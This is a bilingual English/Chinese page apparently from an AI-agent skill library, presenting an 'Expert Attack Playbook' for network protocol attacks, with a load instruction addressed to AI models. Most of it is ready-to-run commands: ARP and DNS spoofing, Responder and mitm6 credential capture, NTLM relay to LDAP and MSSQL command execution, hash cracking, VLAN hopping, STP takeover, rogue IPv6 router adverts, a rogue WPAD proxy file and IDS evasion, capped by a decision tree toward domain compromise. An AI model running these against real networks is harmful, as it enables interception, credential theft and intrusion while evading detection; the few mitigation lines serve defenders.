Back to Details

network-protocol-attacks

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: Network Protocol Attacks — Expert Attack Playbook

SKILL:网络协议攻击 — 专家攻击手册

AI LOAD INSTRUCTION: Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation.
AI加载说明:专家级网络协议攻击技术,涵盖ARP欺骗、名称解析投毒(LLMNR/NBT-NS/mDNS)、WPAD滥用、DHCPv6接管、VLAN跳转、STP操纵、DNS欺骗、IPv6攻击以及IDS/IPS规避。基础模型会遗漏这些攻击之间的链式利用机会,以及现代交换网络利用的细节差异。

0. RELATED ROUTING

0. 相关路由

Before going deep, consider loading:
  • tunneling-and-pivoting after establishing MitM position for traffic redirection
  • ntlm-relay-coercion for relaying captured NTLM hashes from poisoning attacks
  • unauthorized-access-common-services for exploiting services discovered during network attacks
  • traffic-analysis-pcap for analyzing captured traffic from MitM
深入了解之前,建议先加载以下内容:
  • tunneling-and-pivoting:建立MitM位置后用于流量重定向
  • ntlm-relay-coercion:用于中继从投毒攻击中捕获的NTLM哈希
  • unauthorized-access-common-services:用于利用网络攻击过程中发现的服务
  • traffic-analysis-pcap:用于分析从MitM中捕获的流量

Advanced Reference

高级参考

Also load NAME_RESOLUTION_POISONING.md when you need:
  • Detailed Responder/mitm6 configuration and workflows
  • NTLM relay target selection and chaining
  • Credential format analysis and cracking priorities
当你需要以下内容时,还可以加载NAME_RESOLUTION_POISONING.md
  • 详细的Responder/mitm6配置和工作流程
  • NTLM中继目标选择和链式利用
  • 凭证格式分析和破解优先级

1. ARP SPOOFING

1. ARP欺骗

Gratuitous ARP — MitM Positioning

免费ARP — MitM定位

bash
undefined
bash
undefined

arpspoof (dsniff suite)

arpspoof (dsniff suite)

echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP & arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &
echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP & arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &

ettercap — ARP poisoning with sniffing

ettercap — ARP poisoning with sniffing

ettercap -T -q -i eth0 -M arp:remote /VICTIM_IP// /GATEWAY_IP//
ettercap -T -q -i eth0 -M arp:remote /VICTIM_IP// /GATEWAY_IP//

bettercap — modern framework

bettercap — modern framework

bettercap -iface eth0
set arp.spoof.targets VICTIM_IP arp.spoof on net.sniff on
undefined
bettercap -iface eth0
set arp.spoof.targets VICTIM_IP arp.spoof on net.sniff on
undefined

Selective Targeting

定向目标选择

bash
undefined
bash
undefined

bettercap — target specific hosts, avoid detection

bettercap — target specific hosts, avoid detection

set arp.spoof.targets 10.0.0.50,10.0.0.51 set arp.spoof.fullduplex true set arp.spoof.internal true arp.spoof on
undefined
set arp.spoof.targets 10.0.0.50,10.0.0.51 set arp.spoof.fullduplex true set arp.spoof.internal true arp.spoof on
undefined

Detection Indicators

检测指标

  • Duplicate MAC addresses in ARP table
  • Gratuitous ARP storms from non-gateway IPs
  • Tools: 
    arpwatch
    , static ARP entries, 802.1X port authentication
  • ARP表中存在重复MAC地址
  • 来自非网关IP的免费ARP风暴
  • 防护工具:
    arpwatch
    、静态ARP条目、802.1X端口认证

2. LLMNR / NBT-NS / mDNS POISONING

2. LLMNR / NBT-NS / mDNS投毒

Responder — Credential Capture

Responder — 凭证捕获

bash
undefined
bash
undefined

Basic poisoning (LLMNR + NBT-NS + mDNS)

Basic poisoning (LLMNR + NBT-NS + mDNS)

responder -I eth0 -dwPv
responder -I eth0 -dwPv

Key flags:

Key flags:

-d Enable answers for DHCP broadcast requests (fingerprinting)

-d Enable answers for DHCP broadcast requests (fingerprinting)

-w Start WPAD rogue proxy

-w Start WPAD rogue proxy

-P Force NTLM auth for WPAD

-P Force NTLM auth for WPAD

-v Verbose

-v Verbose

Analyze mode only (passive, no poisoning)

Analyze mode only (passive, no poisoning)

responder -I eth0 -A
undefined
responder -I eth0 -A
undefined

Captured Hash Formats

捕获的哈希格式

ProtocolHash TypeHashcat ModeCrackability
NTLMv1NetNTLMv15500Fast — rainbow tables viable
NTLMv2NetNTLMv25600Moderate — dictionary + rules
NTLMv1-ESSNetNTLMv15500Fast — same as NTLMv1
bash
undefined
协议哈希类型Hashcat模式破解难度
NTLMv1NetNTLMv15500快 — 可使用彩虹表破解
NTLMv2NetNTLMv25600中等 — 需字典+规则破解
NTLMv1-ESSNetNTLMv15500快 — 和NTLMv1破解方式一致
bash
undefined

Crack captured hashes

Crack captured hashes

hashcat -m 5600 hashes.txt wordlist.txt -r rules/best64.rule john --format=netntlmv2 hashes.txt --wordlist=wordlist.txt
undefined
hashcat -m 5600 hashes.txt wordlist.txt -r rules/best64.rule john --format=netntlmv2 hashes.txt --wordlist=wordlist.txt
undefined

Relay Instead of Crack

中继而非破解

bash
undefined
bash
undefined

ntlmrelayx — relay captured NTLM to other services

ntlmrelayx — relay captured NTLM to other services

ntlmrelayx.py -tf targets.txt -smb2support ntlmrelayx.py -t ldaps://DC01 --delegate-access # RBCD attack ntlmrelayx.py -t mssql://DB01 -q "exec xp_cmdshell 'whoami'"

---
ntlmrelayx.py -tf targets.txt -smb2support ntlmrelayx.py -t ldaps://DC01 --delegate-access # RBCD attack ntlmrelayx.py -t mssql://DB01 -q "exec xp_cmdshell 'whoami'"

---

3. WPAD ABUSE

3. WPAD滥用

bash
undefined
bash
undefined

Responder with WPAD proxy

Responder with WPAD proxy

responder -I eth0 -wPv
responder -I eth0 -wPv

WPAD flow:

WPAD flow:

1. Client queries DHCP for WPAD → DNS for wpad.domain.com → LLMNR/NBT-NS

1. Client queries DHCP for WPAD → DNS for wpad.domain.com → LLMNR/NBT-NS

2. Responder answers with rogue wpad.dat

2. Responder answers with rogue wpad.dat

3. Browser uses attacker's proxy → forced NTLM auth → credential capture

3. Browser uses attacker's proxy → forced NTLM auth → credential capture

undefined
undefined

Manual WPAD PAC File

手动编写WPAD PAC文件

javascript
// Rogue wpad.dat content
function FindProxyForURL(url, host) {
    return "PROXY ATTACKER_IP:3128; DIRECT";
}
javascript
// Rogue wpad.dat content
function FindProxyForURL(url, host) {
    return "PROXY ATTACKER_IP:3128; DIRECT";
}

4. DHCPv6 ATTACK — mitm6

4. DHCPv6攻击 — mitm6

Even on IPv4-only networks, Windows clients send DHCPv6 solicitations by default.
bash
undefined
即便是仅支持IPv4的网络,Windows客户端默认也会发送DHCPv6请求。
bash
undefined

mitm6 → DNS takeover → NTLM relay

mitm6 → DNS takeover → NTLM relay

mitm6 -d domain.com
mitm6 -d domain.com

In parallel: relay captured NTLM to LDAP(S) for delegation

In parallel: relay captured NTLM to LDAP(S) for delegation

ntlmrelayx.py -6 -t ldaps://DC01 -wh fakewpad.domain.com -l loot --delegate-access
ntlmrelayx.py -6 -t ldaps://DC01 -wh fakewpad.domain.com -l loot --delegate-access

Attack chain:

Attack chain:

1. mitm6 answers DHCPv6 → sets attacker as IPv6 DNS

1. mitm6 answers DHCPv6 → sets attacker as IPv6 DNS

2. Victim DNS queries go to attacker → WPAD redirect

2. Victim DNS queries go to attacker → WPAD redirect

3. Forced NTLM auth → relay to LDAP → create machine account or RBCD

3. Forced NTLM auth → relay to LDAP → create machine account or RBCD

undefined
undefined

Key Conditions

关键前提条件

  • SMB signing disabled on targets (for SMB relay)
  • LDAP signing not enforced on DC (for LDAP relay)
  • Domain Computers quota > 0 (for machine account creation, default: 10)
  • 目标SMB签名未启用(适用于SMB中继)
  • 域控制器LDAP签名未强制启用(适用于LDAP中继)
  • 域计算机账户创建配额>0(默认值为10,用于创建机器账户)

5. VLAN HOPPING

5. VLAN跳转

Switch Spoofing (DTP)

交换机欺骗(DTP)

bash
undefined
bash
undefined

yersinia — DTP attack to negotiate trunk

yersinia — DTP attack to negotiate trunk

yersinia dtp -attack 1 -interface eth0
yersinia dtp -attack 1 -interface eth0

frogger.sh — automated VLAN hopping via DTP

frogger.sh — automated VLAN hopping via DTP

./frogger.sh
./frogger.sh

Sends DTP frames → switch enables trunking → access all VLANs

Sends DTP frames → switch enables trunking → access all VLANs

After trunk established:

After trunk established:

modprobe 8021q vconfig add eth0 TARGET_VLAN ifconfig eth0.TARGET_VLAN 10.10.10.1 netmask 255.255.255.0 up
undefined
modprobe 8021q vconfig add eth0 TARGET_VLAN ifconfig eth0.TARGET_VLAN 10.10.10.1 netmask 255.255.255.0 up
undefined

Double Tagging (802.1Q)

双重标签(802.1Q)

bash
undefined
bash
undefined

Craft double-tagged frame: outer=native VLAN, inner=target VLAN

Craft double-tagged frame: outer=native VLAN, inner=target VLAN

scapy:

scapy:

from scapy.all import * pkt = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP() sendp(pkt, iface="eth0")
from scapy.all import * pkt = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP() sendp(pkt, iface="eth0")

Limitation: one-way only (responses go to real gateway)

Limitation: one-way only (responses go to real gateway)

Effective for blind attacks (e.g., targeting a server)

Effective for blind attacks (e.g., targeting a server)

undefined
undefined

Mitigation

缓解措施

  • Disable DTP: 
    switchport nonegotiate
  • Set native VLAN to unused: 
    switchport trunk native vlan 999
  • Prune VLANs: only allow needed VLANs on trunk ports
  • 禁用DTP:
    switchport nonegotiate
  • 将Native VLAN设置为未使用的VLAN:
    switchport trunk native vlan 999
  • 修剪VLAN:仅允许 trunk端口需要的VLAN通过

6. STP MANIPULATION

6. STP操纵

Root Bridge Claim

根网桥抢占

bash
undefined
bash
undefined

yersinia — claim root bridge with lowest priority

yersinia — claim root bridge with lowest priority

yersinia stp -attack 4 -interface eth0
yersinia stp -attack 4 -interface eth0

Send BPDUs with priority 0 → become root bridge

Send BPDUs with priority 0 → become root bridge

All traffic flows through attacker → MitM

All traffic flows through attacker → MitM

undefined
undefined

Topology Change Attack

拓扑变更攻击

bash
undefined
bash
undefined

Send TC (Topology Change) BPDUs → force MAC table flush

Send TC (Topology Change) BPDUs → force MAC table flush

yersinia stp -attack 1 -interface eth0
yersinia stp -attack 1 -interface eth0

Switches flood all ports temporarily → sniff traffic

Switches flood all ports temporarily → sniff traffic

undefined
undefined

Mitigation

缓解措施

  • BPDU Guard on access ports
  • Root Guard on designated ports
  • spanning-tree portfast bpduguard enable
  • 接入端口启用BPDU Guard
  • 指定端口启用Root Guard
  • 配置命令:
    spanning-tree portfast bpduguard enable

7. DNS SPOOFING

7. DNS欺骗

DNS Cache Poisoning

DNS缓存投毒

bash
undefined
bash
undefined

bettercap DNS spoofing

bettercap DNS spoofing

bettercap -iface eth0
set dns.spoof.domains target.com, *.target.com set dns.spoof.address ATTACKER_IP dns.spoof on
bettercap -iface eth0
set dns.spoof.domains target.com, *.target.com set dns.spoof.address ATTACKER_IP dns.spoof on

ettercap DNS spoofing (via etter.dns config)

ettercap DNS spoofing (via etter.dns config)

echo "target.com A ATTACKER_IP" >> /etc/ettercap/etter.dns ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /VICTIM// /GATEWAY//
undefined
echo "target.com A ATTACKER_IP" >> /etc/ettercap/etter.dns ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /VICTIM// /GATEWAY//
undefined

Kaminsky Attack Variant

Kaminsky攻击变种

Flood recursive resolver with forged responses for random subdomains, each including a malicious authority section pointing the NS record to attacker-controlled server.
向递归解析器泛洪随机子域名的伪造响应,每个响应都包含指向攻击者控制服务器的恶意权威NS记录。

8. IPv6 ATTACKS

8. IPv6攻击

Router Advertisement Spoofing

路由器通告欺骗

bash
undefined
bash
undefined

Send rogue RA → victim configures attacker as default gateway

Send rogue RA → victim configures attacker as default gateway

atk6-fake_router6 eth0 ATTACKER_IPV6_PREFIX/64
atk6-fake_router6 eth0 ATTACKER_IPV6_PREFIX/64

THC-IPv6 suite for comprehensive IPv6 attacks

THC-IPv6 suite for comprehensive IPv6 attacks

atk6-parasite6 eth0 # ICMPv6 neighbor spoofing atk6-redir6 eth0 ... # Traffic redirection via ICMPv6 redirect
undefined
atk6-parasite6 eth0 # ICMPv6 neighbor spoofing atk6-redir6 eth0 ... # Traffic redirection via ICMPv6 redirect
undefined

SLAAC Abuse

SLAAC滥用

bash
undefined
bash
undefined

Advertise rogue prefix → victim auto-configures IPv6 address

Advertise rogue prefix → victim auto-configures IPv6 address

Combined with rogue DNS (RA option) → full MitM over IPv6

Combined with rogue DNS (RA option) → full MitM over IPv6

Windows prioritizes IPv6 over IPv4 by default

Windows prioritizes IPv6 over IPv4 by default


---

---

9. IDS/IPS EVASION

9. IDS/IPS规避

TechniqueMethodTool/Flag
IP FragmentationSplit payload across fragments
nmap -f
, 
fragroute
TTL ManipulationSet TTL to expire at IDS but reach target
fragroute
Encoding EvasionURL/Unicode/hex encodingManual, custom scripts
Session SplicingSplit TCP payload across segments
fragroute
, 
nmap --data-length
Timing-BasedSlow scan to avoid rate-based detection
nmap -T0
, 
nmap -T1
Decoy ScanningMix real scan with decoy source IPs
nmap -D RND:10
Idle/Zombie ScanUse idle host as scan proxy
nmap -sI ZOMBIE_IP
bash
undefined
技术实现方法工具/参数
IP分片将有效载荷拆分到多个分片
nmap -f
, 
fragroute
TTL操纵设置TTL值使其在IDS处过期但能到达目标
fragroute
编码规避URL/Unicode/十六进制编码手动编写、自定义脚本
会话拼接将TCP有效载荷拆分到多个段
fragroute
, 
nmap --data-length
基于时间规避慢速扫描规避基于速率的检测
nmap -T0
, 
nmap -T1
诱饵扫描混合真实扫描流量和伪造源IP流量
nmap -D RND:10
空闲/僵尸扫描使用空闲主机作为扫描代理
nmap -sI ZOMBIE_IP
bash
undefined

fragroute — fragment and reorder packets

fragroute — fragment and reorder packets

echo "ip_frag 8" > /tmp/frag.conf echo "order random" >> /tmp/frag.conf fragroute -f /tmp/frag.conf TARGET_IP
echo "ip_frag 8" > /tmp/frag.conf echo "order random" >> /tmp/frag.conf fragroute -f /tmp/frag.conf TARGET_IP

nmap evasion combinations

nmap evasion combinations

nmap -sS -f --mtu 24 --data-length 50 -D RND:5 -T2 TARGET

---
nmap -sS -f --mtu 24 --data-length 50 -D RND:5 -T2 TARGET

---

10. DECISION TREE

10. 决策树

Network access obtained — want to escalate via network attacks
├── On same broadcast domain as targets?
│   ├── YES → ARP spoof for MitM (§1)
│   │   └── Capture plaintext creds or redirect traffic
│   └── NO → need VLAN hopping first (§5)
│       ├── DTP enabled? → switch spoofing
│       └── Know native VLAN? → double tagging
├── Windows environment?
│   ├── LLMNR/NBT-NS enabled? (default YES)
│   │   └── Run Responder (§2) → capture NetNTLM hashes
│   │       ├── NTLMv1? → crack fast or relay
│   │       └── NTLMv2? → relay (§2) or crack with rules
│   │
│   ├── WPAD configured or auto-detect? → WPAD abuse (§3)
│   │
│   └── IPv6 not hardened? (default) → mitm6 + ntlmrelayx (§4)
│       └── LDAP relay → RBCD → domain compromise
├── Need DNS control?
│   ├── MitM already established? → DNS spoofing (§7)
│   └── DHCPv6 available? → mitm6 for DNS takeover (§4)
├── Managed switches with weak config?
│   ├── BPDU Guard off? → STP root bridge claim (§6)
│   └── DTP enabled? → VLAN hopping (§5)
├── IPv6 attack surface?
│   └── RA spoofing / SLAAC abuse (§8) → MitM over IPv6
└── IDS/IPS in path?
    └── Apply evasion techniques (§9) — fragmentation, timing, encoding
已获得网络访问权限 — 希望通过网络攻击提升权限
├── 和目标处于同一个广播域?
│   ├── 是 → ARP欺骗获取MitM位置(§1)
│   │   └── 捕获明文凭证或重定向流量
│   └── 否 → 先进行VLAN跳转(§5)
│       ├── DTP已启用? → 交换机欺骗
│       └── 已知Native VLAN? → 双重标签攻击
├── Windows环境?
│   ├── LLMNR/NBT-NS已启用?(默认开启)
│   │   └── 运行Responder(§2) → 捕获NetNTLM哈希
│   │       ├── NTLMv1? → 快速破解或中继
│   │       └── NTLMv2? → 中继(§2)或使用规则破解
│   │
│   ├── WPAD已配置或启用自动检测? → WPAD滥用(§3)
│   │
│   └── IPv6未做安全加固?(默认未加固 → mitm6 + ntlmrelayx(§4)
│       └── LDAP中继 → RBCD → 域权限接管
├── 需要DNS控制权?
│   ├── 已建立MitM位置? → DNS欺骗(§7)
│   └── DHCPv6可用? → 使用mitm6完成DNS接管(§4)
├── 管理型交换机配置存在弱点?
│   ├── BPDU Guard未开启? → STP根网桥抢占(§6)
│   └── DTP已启用? → VLAN跳转(§5)
├── IPv6攻击面存在?
│   └── RA欺骗 / SLAAC滥用(§8) → 基于IPv6的MitM
└── 路径中存在IDS/IPS?
    └── 应用规避技术(§9) — 分片、时间控制、编码